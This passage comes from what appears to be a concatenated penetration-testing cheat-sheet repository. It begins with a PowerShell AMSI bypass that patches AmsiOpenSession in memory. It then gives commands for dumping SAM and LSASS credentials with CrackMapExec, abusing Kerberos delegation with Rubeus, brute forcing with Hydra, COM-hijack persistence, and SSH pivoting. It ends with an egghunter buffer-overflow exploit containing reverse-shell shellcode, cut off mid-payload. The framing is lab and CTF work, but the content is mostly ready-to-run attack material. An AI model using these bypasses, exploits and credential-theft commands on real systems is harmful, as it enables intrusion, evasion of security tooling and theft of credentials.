23 | 	$type.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).
24 | 	SetImplementationFlags('Runtime, Managed')
25 | 	 
26 | 	$type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')
27 | 	return $type.CreateType()
28 | }
29 | 
30 | [IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession
31 | $oldProtectionBuffer = 0
32 | $vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), 
33 | (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])))
34 | $vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer)
35 | $buf = [Byte[]] (0x48, 0x31, 0xC0) 
36 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3)
37 | $vp.Invoke($funcAddr, 3, 0x20, [ref]$oldProtectionBuffer)
38 | 


--------------------------------------------------------------------------------
/windows/crackmapexec.txt:
--------------------------------------------------------------------------------
 1 | Crackmapexec is the swiss army knife for Windows (Active Directory) environments.
 2 | Using cme usually requires some form of credentials first. The commands can be used
 3 | against a single target or a whole subnet.
 4 | 
 5 | General flags:
 6 |     syntax : crackmapexec (<protocol>) <targetIP> -u '<username>' -p '<password>'
 7 |         -h              -> check which protocols are available for use
 8 |         --pass-pol      -> enumerate domain password policy and complexity requirements
 9 |         --local-auth    -> use local auth, instead of domain auth
10 |         --shares        -> enumerate network shares on target
11 |         --lusers        -> enumerate logged in users on target
12 |         --wdigest enable/disable    -> enable/disable WDigest provider to dump clear-text credentials from lsass
13 |         --sam           -> dump SAM of target
14 |         --lsa           -> dump lsass
15 |         -m enum_avproducts  -> enumerate antivirus products installed on the target 
16 | 
17 | Use crackmapexec to bruteforce all AD objects (users, groups...) on a Windows host:
18 | 	syntax : crackmapexec <protocol> <targetIP> -d <domain> -u <user> -p <pass> --rid-brute
19 | 	example: crackmapexec smb 10.11.2.13 -d ecorp.local -u geoffrey -p p@ssw0rd --rid-brute
20 | 
21 | Check which accounts can login via a certain password:
22 | 	syntax : crackmapexec <protocol> <targetIP> -p '<password>' -u <username/userlist> --continue-on-success   # Don't stop bruteforcing when a valid attempt has been found
23 | 	example: crackmapexec smb 10.12.32.221 -p 'SuperS3cureP@ss' -u users.txt (-u 'tyrell')
24 | 	example: crackmapexec smb targets.txt -p 'SuperS3cureP@ss' -u users.txt (-u 'tyrell')
25 | 
26 | 	example: crackmapexec winrm <targetIP> -d <domain> -H <ntHash> -u <user>
27 | 	example: crackmapexec winrm 10.12.32.221 -d 'ecorp.local' -H 322457b72d4f136d50d99bdbb922d109 -u 'tyrell'
28 | 
29 |     example: crackmapexec winrm 10.12.32.0/24 -d 'ecorp.local' -H 322457b72d4f136d50d99bdbb922d109 -u 'tyrell'
30 | 
31 | Execute commands on a remote Windows system:
32 | 	syntax : crackmapexec <protocol> <targetIP> -u <username> -p '<password>' -x <cmd>
33 | 	example: crackmapexec smb 10.12.32.221 -u Administrator -p 'P@ssw0rd' -x "whoami"   # -X for Powershell commands
34 | 	example: crackmapexec winrm 10.12.32.221 -u Administrator -p 'P@ssw0rd' -x "whoami" 
35 | 
36 | 


--------------------------------------------------------------------------------
/windows/active_directory/constrained_delegation.txt:
--------------------------------------------------------------------------------
 1 | Get cached TGT ticket from the machine for the user that has constrained delegation set (requires elevated privileges, we use TGT because we don't have the user's NTLM hash):
 2 |     Step 1: Dump all tickets for krbtgt service
 3 |         example: Rubeus.exe dump /service:krbtgt /nowrap    -> grab the base64 encoded ticket
 4 | 
 5 |     Step 2: Impersonate a user that has local admin privileges on the target machine for which the delegation is allowed
 6 |         syntax : Rubeus.exe s4u /impersonateuser:<targetUser> /msdsspn:<service>/<machine>.<domain> /ticket:<base64TGT>
 7 |         example: Rubeus.exe s4u /impersonateuser:t.wellick /msdsspn:cifs/sql-1.ecorp.local /ticket:<base64TGT>  -> this gives us <base64TGS>
 8 | 
 9 |     Step 3: Create a process that we can impersonate:
10 |         example: Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe   -> grab the LUID and processID
11 | 
12 |     Step 4: Pass the ticket:
13 |         syntax : Rubeus.exe ptt /luid:<LUID> /ticket:<base64TGS>
14 |         example: Rubeus.exe ptt /luid:0x259b596 /ticket:<base64TGS>
15 | 
16 |     Step 5: Impersonate the process (we use Cobalt Strike for this)
17 |         syntax : steal_token <processID>
18 |         example: steal_toke 3126
19 | 
20 |     Optionl step 6: See if the token worked for the target machine
21 |         example: dir \\sql-1\c$
22 | 
23 | Abuse constrained delegation, but without having the delegating user's hash or TGT:
24 |     Step 1: Request a TGT for the current user
25 |         example: rubeus.exe tgtdeleg /nowrap    -> this gives us <base64TGT>
26 |         
27 |     Step 2: Create a sacrificial process
28 |         syntax : Rubeus.exe createnetonly /program:<program> -> inject into this process 
29 |         example: Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe -> inject into this process 
30 |     
31 |     Step 3: Impersonate a user and inject their forwardable TGS into the current process
32 |         syntax : Rubeus.exe s4u /user:<delegatingUser> /ticket:<base64TGT> /impersonateuser:<targetUser> /msdsspn:<service/<targetMachine> /altservice:<altService> /ptt
33 |         example: Rubeus.exe s4u /user:svc_sql /ticket:<base64TGT> /impersonateuser:t.wellick /msdsspn:time/mweb.ecorp.local /altservice:cifs,host,http,winrm,RPCSS,wsman,krbtgt /ptt
34 | 
35 |     Optional Step 4: See if the token worked for the target machine
36 |         example: dir \\mweb.ecorp.local\c$
37 | 


--------------------------------------------------------------------------------
/azure_ad/recon.txt:
--------------------------------------------------------------------------------
 1 | Inspired by Pentester Academy - Attacking and Defending Azure Active Directory
 2 | Numerous commands to do OSINT recon on Azure Active Directory (Most, if not all tools listed here are in Powershell):
 3 |     
 4 |     Check if an Azure Tenant exists and if it does, get information about it:
 5 |        syntax : https://login.microsoftonline.com/getuserrealm.srf?login=<username>@<domain>&xml=1
 6 |        example: https://login.microsoftonline.com/getuserrealm.srf?login=non-existent@ecorp.com&xml=1
 7 |     
 8 |     Get the tenant ID:
 9 |         syntax : https://login.microsoftonline.com/<domain>/.well-known/openid-configuration
10 |         example: https://login.microsoftonline.com/ecorp.com/.well-known/openid-configuration
11 | 
12 |     Gather information using AADInternals:
13 |         Step 1: clone https://github.com/Gerenios/AADInternals
14 |         Step 2: import the module in your Powershell session
15 |             example: Import-Module C:\Tools\AADInternals\AADInternals.psd1
16 |         Step 3: use the tool
17 |             Get information about the tenant and check validity of username
18 |                 syntax : Get-AADIntLoginInformation -UserName <username>@<domain>
19 |                 example: Get-AADIntLoginInformation -UserName admin@ecorp.com
20 |     
21 |             Get the tenant domains:
22 |                 syntax : Get-AADIntTenantDomains -Domain <domain>
23 |                 example: Get-AADIntTenantDomains -Domain ecorp.com
24 | 
25 |             Get some general public information we can gather about a tenant
26 |                 syntax : Invoke-AADIntReconAsOutsider -Domain <domain>
27 |                 example: Invoke-AADIntReconAsOutsider -Domain ecorp.com
28 | 
29 |     Enumerate email addresses:
30 |         Step 1: clone https://github.com/LMGsec/o365creeper
31 |         Step 2:
32 |             syntax : python.exe C:\Tools\o365creeper\o365creeper.py -f <emailFile> -o <outFile>
33 |             example: python.exe C:\Tools\o365creeper\o365creeper.py -f emails.txt -o valid.txt 
34 | 
35 |     Enumerate Azure Services:
36 |         Step 1: clone https://github.com/NetSPI/MicroBurst
37 |         Step 2: import the module in your Powershell session
38 |             example: Import-Module C:\Tools\MicroBurst\MicroBurst.psm1
39 |         Step 3: use the tool
40 |             Enumerate subdomains for an organization:
41 |                syntax : Invoke-EnumerateAzureSubDomains -Base <organizationName> -Verbose
42 |                example: Invoke-EnumerateAzureSubDomains -Base ecorp -Verbose 
43 | 


--------------------------------------------------------------------------------
/binary_exploitation/reverse_engineering/recon.txt:
--------------------------------------------------------------------------------
 1 | Tools to gather information about a binary (https://ropemporium.com/guide.html):
 2 | 
 3 | 	Checking what type of file we are dealing with:
 4 | 
 5 | 		syntax : file <binary>
 6 | 
 7 | 	Checking protections (NX/DEP...) enabled on a binary:
 8 | 
 9 | 		syntax : rabin2 -I <binary>	# apt-get install radare2
10 | 		syntax : checksec <binary>
11 | 
12 | 	Checking functions imported from shared libraries:
13 | 
14 | 		syntax : rabin2 -i <binary>
15 | 		syntax : rabin2 -qs <binary>
16 | 		syntax : readelf -s <binary>
17 | 
18 | 	Checking strings present in a binary:
19 | 
20 | 		syntax : strings <binary>
21 | 		syntax : rabin2 -z <binary>	# Only prints strings that were added by a programmer (so not all the default stuff)
22 | 
23 | 	Disassembly of a binary:
24 | 
25 | 		syntax : objdump -d <binary> > <filename>.asm
26 | 		syntax : objdump -M <syntax> -d <binary> > <filename>.asm	# specify different disassembly syntax with -M flag
27 | 		example: objdump -M intel -d vuln.exe > disassembly_intel.asm
28 | 
29 | 	Check what a binary is actually doing via terminal output:
30 | 
31 | 		syntax : ltrace ./<binary>
32 | 
33 | 	Check function method names of a binary:
34 | 
35 | 		syntax : nm <binary>
36 | 	
37 | 	Check buffer length needed for overflow:
38 | 
39 | 		Step 1: dmesg -C	-> clear ring buffer
40 | 		Step 2: overflow the binary
41 | 		Step 3: dmesg -t	-> check where crash happened
42 | 
43 | 		Via gdb (with peda installed):
44 | 		Step 1: gdb <binary>
45 | 		Step 2: pattern_create <length>		-> copy the resulting pattern
46 | 		Step 3: run
47 | 		Step 4: paste pattern when asked for input
48 | 		Step 5: grab the ascii value from EIP (x86) or RSP (x64) -> <value>
49 | 		Step 6: pattern_offset <value>
50 | 
51 | 	Search for certain instructions (gadgets) in a binary:
52 | 
53 | 		syntax : ropper --file <binary> --search <instruction>
54 | 		example: ropper --file ropme --search 'pop rdi; ret;'
55 | 		example: ropper --file ropme --search 'mov|pop'	
56 | 			 	 # only search for mov and pop instructions
57 | 		example: ropper --file ropme -b 4142436545
58 | 				 # exclude bad characters (characters are in hex: 'A' -> '41')
59 | 
60 | 	Check essential information about a binary (mainly to find an address to write a string to):
61 | 
62 | 		syntax : readelf -a <binary>
63 | 		syntax : readelf --sections <binary>		
64 | 
65 | 		Check what the target section contains:
66 | 		syntax : readelf -x <section> <binary>
67 | 		example: readelf -x .data vuln.exe
68 | 
69 | 	Check permissions on sections in a binary (find a place to write a string to):
70 | 
71 | 		Step 1: r2 <binary>
72 | 		Step 2: aaa
73 | 		Step 3: iS
74 | 


--------------------------------------------------------------------------------
/networking/vm_bridge.txt:
--------------------------------------------------------------------------------
 1 | Set up a bridge between your Linux and Windows VM so you can access an interface (lab VPN) on your 
 2 | Linux machine via your Windows VM (very useful for Hack The Box or other lab environments).
 3 | Heavily inspired by Rasta Mouse's Red Team Ops lab setup:
 4 |     https://raw.githubusercontent.com/ZeroPointSecurity/RTOVMSetup/master/kali.sh
 5 |     https://raw.githubusercontent.com/ZeroPointSecurity/RTOVMSetup/master/win10.choco
 6 | 
 7 | VMware Workstation:
 8 | Linux:
 9 |     Step 1: Create a new network adapter for both machines in settings
10 |             and choose custom specific virtual network (VMNET 2 or whatever is not taken)
11 |     Step 2: sudo apt -y install iptables-persistent netfilter-persistent 
12 |     Step 3: sudo systemctl disable network-manager.service
13 |     Step 4: choose a vacant static ip address for eth1
14 |         syntax : echo -en "\n\nauto eth1\niface eth1 inet static\n\taddress <ipAddress>\n\tnetmask <subnetmask>" | sudo tee -a /etc/network/interfaces
15 |         example: echo -en "\n\nauto eth1\niface eth1 inet static\n\taddress 192.168.145.200\n\tnetmask 255.255.255.0" | sudo tee -a /etc/network/interfaces
16 |     Step 5: sudo service networking restart
17 |     Step 6: enable ipv4 forwarding in /etc/sysctl.conf
18 |         example: net.ipv4.ip_forward=1
19 |     Step 7: set up forwarding to lab interface 
20 |         syntax : sudo iptables -t nat -A POSTROUTING -o <labVPNInterface> -j MASQUERADE
21 |         example: sudo iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE
22 |     Step 8: sudo netfilter-persistent save
23 |     Step 9: sudo systemctl enable netfilter-persistent.service
24 | 
25 | Windows: 
26 |     Step 1: set up second network adapter on Windows
27 |         syntax : netsh interface ip set address "Ethernat1" static <ipAddress> <subnetmask> <defaultGateway>    # gateway will be your Linux' eth1 ipv4 address
28 |         example: netsh interface ip set address "Ethernet1" static 192.168.145.201 255.255.255.0 192.168.145.200
29 |     Step 2: add routes to the VPN lab IP ranges that you want to access
30 |         syntax : route add -p <labIpRange> mask <subnetmask> <defaultGateway>
31 |         example: route add -p 10.10.10.0 mask 255.255.255.0 192.168.145.200
32 |         # you can add multiple routes if you want to
33 |         example: route add -p 10.11.10.0 mask 255.255.255.0 192.168.145.200
34 | 
35 | In Windows, you have to check the firewall settings and allow inbound/outbound traffic from and to your Linux VM's static IP address.
36 | After all these steps are completed, reboot both machines.
37 | Start the lab VPN on your Linux host and browse to a website in the lab (https://10.10.10.10) on your Windows machine to see if it works.
38 | 


--------------------------------------------------------------------------------
/bruteforce/hydra.txt:
--------------------------------------------------------------------------------
 1 | Hydra is an all-round bruteforcing tool used on multiple different services
 2 | 
 3 | Extra options:
 4 | 	-f: Stop on the first correct combination
 5 | 	-V: Verbose (print all combinations)
 6 | 	-u: When using a userlist, this option tries one password on every user, 
 7 | 	    before moving on to the next password. Default tries all passwords
 8 | 	    for one user, before moving on to the next user.
 9 | 
10 | Hydra bruteforce on a web directory that requires authentication through a popup form (basic authorization header):
11 | 
12 | 	syntax : hydra -V -f -l/-L <user/list> -p/-P <pass/list> <victimIP> <module> <webPath>
13 | 	example: hydra -V -f -l admin -P /usr/share/wordlists/rockyou.txt 10.13.38.11 http-get /admin
14 | 
15 | 
16 | Hydra bruteforce on an html login form (use burp-suite to check <data>):
17 | 
18 | 	syntax : hydra -V -l/-L <user/list> -p/-P <pass/list> <victimIP> <module> "<webPath>:<data>:<errorMsg>"
19 | 	example: hydra -V -f -l Tyrone -P /usr/share/wordlists/rockyou.txt 10.12.15.153 http-post-form "/moodle/login/index.php:username=^USER^&password=^PASS^:Invalid login, please try again!"
20 |     example: hydra -V -f -l Tyrone -P /usr/share/wordlists/rockyou.txt 10.12.15.153 http-get-form "/moodle/login/index.php:username=^USER^&password=^PASS^:Invalid login, please try again!"
21 | 
22 | 
23 |     # With JSON POST data, different port, and headers
24 | 
25 |     syntax : hydra -V -f -s <port> -l/L <user/list> -p/-P <pass/list> <victimIP> <module> "<webPath>:<data>:<errorMsg>:H=<header>" 
26 |     example: hydra -V -f -s 8081 -l admin -P /usr/share/wordlists/rockyou.txt 10.13.38.19 http-post-form "/artifactory/ui/auth/login?_spring_security_remember_me=false:{\"user\"\:\"^USER^\",\"password\"\:\"^PASS^\",\"type\"\:\"login\"}:Username or password are incorrect:H=Accept: application/json, text/plain, */*:H=Accept-Language: en-US,en;q=0.5:H=Accept-Encoding: gzip, deflate:H=Content-Type: application/json:H=Request-Agent: artifactoryUI:H=serial: 16:H=X-Requested-With: artUI"
27 | 
28 | Hydra bruteforce on an oracle tns listener (default port 1521):
29 | 
30 | 	syntax : hydra -V -f -P <dictionary> -t <threads> -s <targetPort> <targetIP> <module>
31 | 	example: hydra -V -f -P /usr/share/wordlists/rockyou.txt -t 32 -s 1521 11.12.10.82 oracle-listener
32 | 
33 | 
34 | Hydra bruteforce to crack ssh credentials:
35 | 
36 | 	syntax : hydra -l/-L <user/list> -p/-P <pass/list> ssh://<targetIP>
37 | 	example: hydra -V -f -L userlist.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.7
38 | 
39 | 
40 | Hydra bruteforce to crack rdp credentials:
41 | 
42 | 	syntax : hydra -V -f -l/-L <user/list> -p/-P <pass/list> rdp://<targetIP>
43 | 	example: hydra -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.5.12.3
44 | 	
45 | 


--------------------------------------------------------------------------------
/post_exploitation/windows/com_hijack.txt:
--------------------------------------------------------------------------------
 1 | Create persistence by hijacking COM objects where the instance of an application loads items that don't exist:
 2 | 
 3 |     Process Monitor:
 4 |         Step 1(attacker): Get procmon.exe from Sysinternals suite (https://docs.microsoft.com/en-us/sysinternals/downloads/procmon)
 5 |         Step 2(victim)  : Execute the binary and enter filter items:
 6 |                             Operation is RegOpenKey
 7 |                             Result is NAME NOT FOUND
 8 |                             Path ends with InprocServer32
 9 |         Step 3(victim)  : Look for COM objects that are loaded not too often to prevent detection, grab its CLSID
10 |         Step 4(attacker): Create your malicious DLL and load it onto the victim's computer
11 |         Step 5(victim)  : Add registry entries to complete the COM hijack (Powershell):
12 |                             Step 1: New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{<CLSID>}"
13 |                             Step 2: New-Item -Path "HKCU:Software\Classes\CLSID\{<CLSID>}" -Name "InprocServer32" -Value "<pathToMaliciousDLL>"
14 |                             Step 3: New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{<CLSID>}\InprocServer32" -Name "ThreadingModel" -Value "Both"
15 | 
16 |     Task Scheduler:
17 |        Step 1(victim): Look for COM objects in Task Scheduler with Powershell script below, grab the CLSID:
18 | 			$Tasks = Get-ScheduledTask
19 | 
20 | 			foreach ($Task in $Tasks) {
21 | 				if ($Task.Actions.ClassId -ne $null) {
22 | 					if ($Task.Triggers.Enabled -eq $true) {
23 | 						if ($Task.Principal.GroupId -eq "Users") {
24 | 							Write-Host "Task Name: " $Task.TaskName
25 | 							Write-Host "Task Path: " $Task.TaskPath
26 | 							Write-Host "CLSID: " $Task.Actions.ClassId
27 | 							Write-Host
28 | 						}
29 | 					}
30 | 				}
31 | 			}
32 | 
33 | 		Step 2(victim): Look up the implementation of the COM object in HKEY_CLASSES_ROOT\CLSID:
34 | 			Get-Item -Path "Registry::HKCR\CLSID\{<CLSID>}" | ft -AutoSize
35 | 			Get-ChildItem -Path "Registry::HKCR\CLSID\{<CLSID>}" | ft -AutoSize
36 | 
37 | 		Step 3: Check if we can hijack with a duplicate entry if COM object is implemented only in HKLM and not HKCU:
38 | 			Get-Item -Path "HKLM:Software\Classes\CLSID\{<CLSID>}" | ft -AutoSize	-> valid result
39 | 			Get-Item -Path "HKCU:Software\Classes\CLSID\{<CLSID>}" | ft -AutoSize	-> no result
40 | 
41 | 		Step 4: Hijack the COM object by writing a DUPLICATE ENTRY (so with the same attributes) in HKCU:
42 | 			 Step 1: New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{<CLSID>}"
43 |              Step 2: New-Item -Path "HKCU:Software\Classes\CLSID\{<CLSID>}" -Name "InprocServer32" -Value "<pathToMaliciousDLL>"
44 |              Step 3: New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{<CLSID>}\InprocServer32" -Name "ThreadingModel" -Value "Both"
45 | 
46 | 			
47 | 


--------------------------------------------------------------------------------
/pivoting/ssh.txt:
--------------------------------------------------------------------------------
 1 | Use ssh local static port forwarding to get access to a remote target's <victim_port> on the specified <attacker_port> by ssh'ing from our attacker machine to the victim machine:
 2 | 	syntax : ssh <user>@<victimIP> -L <interface>:<attacker_port>:<interface>:<victim_port>
 3 | 	example: ssh dave@10.10.13.109 -L 127.0.0.1:8002:192.168.45.67:80   # forward local port 8002 on attacker machine to port 80 of a machine in the internal network that the victim machine can reach
 4 | 	example: ssh dave@10.10.13.109 -N -L 127.0.0.1:8002:127.0.0.1:8080	# ssh-tunneling without getting an actual shell on the host (background with &)
 5 | 
 6 | Use ssh remote static port forwarding to get access to a remote target's <victim_port> on the specified <attacker_port> by ssh'ing from the victim machine to our attacker machine:
 7 | 	syntax : ssh <user>@<attackerIP> -R <interface>:<victim_port>:<interface>:<attacker_port>
 8 | 	example: ssh kali@192.168.0.123 -R 127.0.0.1:3306:127.0.0.1:3307 
 9 | 
10 | Use dynamic ssh tunneling to forward all incoming traffic through the remote machine(socks proxy):
11 | 	Step 1(attacker): 
12 |         syntax : ssh -D <attacker_socks_port> <user>@<victimIP>
13 |         example: ssh -D 1080 admin@10.27.39.56
14 | 	Step 2(attacker): vi /etc/proxychains.conf 	    # add "socks4 127.0.0.1 1080" or "socks5 127.0.0.1 1080"
15 | 	Step 3(attacker): execute commands on the attacking machine and forward it to the remote machine
16 | 		
17 | 		# Example with nmap
18 | 		syntax : proxychains nmap -p <port> -sT -Pn -n <target_ip_range>
19 | 		example: proxychains nmap -p 22 -sT -Pn -n 10.13.13.1-15
20 | 		example: proxychains ssh admin@10.13.13.4
21 | 
22 | Use a compromised machine to set up a reverse SOCKS proxy on the remote machine into the victim's network (if we can't do an inbound ssh to the victim):
23 |     Step 1(victim)  : 
24 |         syntax : ssh -R <interface>:<attacker_socks_port> <user>@<attackerIP>
25 |         example: ssh -R 0.0.0.0:1080 kali@220.34.54.91
26 |     Step 2(attacker):
27 |         example: proxychains -q nmap -Pn -sT -n -p 80,443 <targetIP>
28 | 
29 | OR when SSH is not a modern version and doesn't support the above, we can forward victim's SSH port to attacker and then connecting back
30 | 
31 |     Step 1(victim)  :
32 |         syntax : ssh -R <interface>:<attacker_port>:<interface>:<victim_ssh_port> <user>@<attackerIP>
33 |         example: ssh -R 127.0.0.1:2222:127.0.0.1:22 kali@220.34.54.91
34 |     Step 2(attacker):
35 |         syntax : ssh -D <attacker_socks_port> <user>@127.0.0.1 -p <attacker_port>
36 |         example: ssh -D 1080 dave@127.0.0.1 -p 2222
37 |     Optional step 3(attacker):
38 |         proxychains -q nmap -Pn -sT -n -p 22,80,443 <targetIP>
39 | 
40 | Use a compromised machine to tunnel to us so we can attack another network via our attacking machine (if we can't do an initial inbound ssh):
41 | 	Step 1(attacker): service ssh start
42 | 	Step 2(victim)	: 
43 |         syntax : ssh -f -N -R <interface>:<attacker_port>:<interface>:22 <attacker>@<attackerIP>	
44 |         example: ssh -f -N -R 127.0.0.1:2222:127.0.0.1:22 hacker@192.168.0.128
45 | 	Step 3(attacker): 
46 |         syntax : ssh -f -N -D <interface>:<attacker_port> -p 2222 <victim>@127.0.0.1	
47 |         example: ssh -f -N -D 127.0.0.1:8080 -p 2222 sysadmin@127.0.0.1
48 | 	Step 4(attacker): vi /etc/proxychains.conf -> add "socks4 127.0.0.1 8080" to the list for this example
49 | 	
50 | 	Example Step 5(attacker): proxychains nmap -sT -Pn -n 10.15.23.12
51 | 


--------------------------------------------------------------------------------
/binary_exploitation/reverse_engineering/gdb.txt:
--------------------------------------------------------------------------------
 1 | Very handy gdb cheatsheet: http://users.ece.utexas.edu/~adnan/gdb-refcard.pdf
 2 | Simplistic view of steps needed to do a buffer overflow attack (first get the binary over to your host machine or to a copy of the victim machine:
 3 | 
 4 | 	Step 1: gdb ./<binary>
 5 | 	Step 2: main
 6 | 	Step 3: r (run)	     # example: gbd ./runme `python -c 'print "A"*200'`
 7 | 	Step 4: c (continue)
 8 | 
 9 | 
10 | 	optionals   : checksec; si (switch to instructions); x/s 0x532b45 (check address); p system (get addr of system); searchmem /bin/sh (search for addr); disas main (disassemble main);
11 | 	get sys addr: readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system;
12 | 	get /bin/sh : strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
13 | 
14 | 	check ASLR  : ldd <binary> | grep libc	# if memory address changes everytime, ASLR is enabled
15 | 	disable ASLR: sudo echo 0 > /proc/sys/kernel/randomize_va_space
16 | 	exploit dev : locate pattern 			# pattern_create.rb
17 | 	epxloit dev2: pattern_create.rb -l 200 		# generates a string, run it with the binary in gdb and get the break address
18 | 	exploit dev3: pattern_offset.rb -q 62413762	# get offset of the memory address of the break caused by pat_create string (remove the 0x)
19 | 
20 | 
21 | Alternate debugging of a binary for a buffer overflow exploit (binary forks when it crashes):
22 | 
23 | 	Step 1(term): ps -ef | grep <binaryName>
24 | 	Step 2(term): gdb --pid=<pid>
25 | 	Step 3(gdb) : show follow-fork-mode
26 | 	Step 4(gdb) : show detach-on-fork
27 | 	Step 4(gdb) : set detach-on-fork off
28 | 	Step 5(gdb) : fuzz the binary to check where it crashes
29 | 	Step 6(gdb) : x/10s and x/50s to see at what memory address the service crashes
30 | 
31 | 		commands:
32 | 			info inferior  : show info about parents/childs
33 | 			inferior <id>  : switch to node <id>
34 | 			x/10s <memAddr>: check next 10 memory addresses after <memAddr> in string format
35 |             x/10gx <reg>   : check next 10 memory addresses after <reg>, use to see stack space for rop chains  # send 200 characters, then do x/10gx $rsp to see how many are on the stack
36 | 			x/40s <memAddr>: check next 40 memory addresses after <memAddr> in hex format
37 | 
38 | Common gdb commands:
39 | 
40 | 	# run program
41 | 	example: run | r
42 | 
43 |     # display virtual memory space mapping
44 |     example: vmmap
45 |     example: vmmap libc
46 | 
47 |     # get all functions and their address
48 |     example: info functions
49 | 
50 |     # get contents of all registers
51 |     example: info registers
52 |     
53 |     # disassemble function
54 |     syntax : disassemble <function>
55 |     example: disassemble main
56 |     example: disas main
57 | 
58 |     # show contents of object
59 |     syntax : print <object>
60 |     example: print $rbp
61 |     example: print sayHello
62 |     example: print *0x7f776589
63 | 
64 |     # examine memory locations  (g = 8 bytes, w = 4 bytes, i = instructions)
65 |     syntax : x/<#units><dataType> <location>
66 |     example: x/100gx $rsp
67 |     example: x/20wx *0x7f776589
68 |     example: x/5i $rip  # show 5 next instructions from where rip is currently pointing
69 |     
70 | 	# breakpoint at function
71 | 	syntax : break <function>
72 |     
73 |     # set breakpoint at x space in function
74 |     syntax : break *<function>+<space>
75 |     example: break *main+154
76 | 
77 |     # list and delete breakpoints
78 |     Step 1 : info b     -> check num
79 |     Step 2 : del <num>
80 | 
81 | 	# step through debugger
82 | 	example: s
83 | 	# Step over function
84 | 	example: next
85 | 	# Finish current function
86 | 	example: finish
87 | 
88 | 	# continue until next breakpoint
89 | 	example: c | continue
90 | 


--------------------------------------------------------------------------------
/binary_exploitation/buffer_overflow/egg_hunting/bighead.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | # This script is taken from Ippsec's Bighead video (https://www.youtube.com/watch?v=VBt-CmjMYiM)
 4 | # The egghunter might take a while to find the actual shellcode (could take 5-10 mins)
 5 | 
 6 | import requests
 7 | 
 8 | rhost = 'dev.bighead.htb'
 9 | rport = '80'
10 | url = 'http://' + rhost + ':' + rport
11 | 
12 | jmp_esp = '\xf0\x12\x50\x62' # 0x625012f0
13 | jmp_eax = '\xf2\x12\x50\x62' # 0x625012f2
14 | 
15 | # The egghunter will look through the target machine's memory for 'w00tw00t', then when it finds it,
16 | # it executes the shellcode that comes after it
17 | egghunter = ''
18 | egghunter += '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74'
19 | egghunter += '\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7'
20 | 
21 | # a 'nopsled' the size of 'EIP overwrite' ("A"*72) divided by 2, because it's two characters
22 | nopsled = '\x90' * (72 / 2)
23 | 
24 | # Windows stageless reverse shell payload
25 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.123 LPORT=443 -f python -v shellcode
26 | shellcode =  "w00tw00t" # This is what the egghunter will look for, then it will execute the shellcode after it
27 | shellcode += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64"
28 | shellcode += "\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"
29 | shellcode += "\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c"
30 | shellcode += "\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"
31 | shellcode += "\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
32 | shellcode += "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49"
33 | shellcode += "\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
34 | shellcode += "\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"
35 | shellcode += "\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b"
36 | shellcode += "\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
37 | shellcode += "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
38 | shellcode += "\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77"
39 | shellcode += "\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
40 | shellcode += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b"
41 | shellcode += "\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
42 | shellcode += "\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0a"
43 | shellcode += "\x0e\x09\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56"
44 | shellcode += "\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c"
45 | shellcode += "\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5"
46 | shellcode += "\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
47 | shellcode += "\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01"
48 | shellcode += "\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56"
49 | shellcode += "\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f"
50 | shellcode += "\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08"
51 | shellcode += "\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
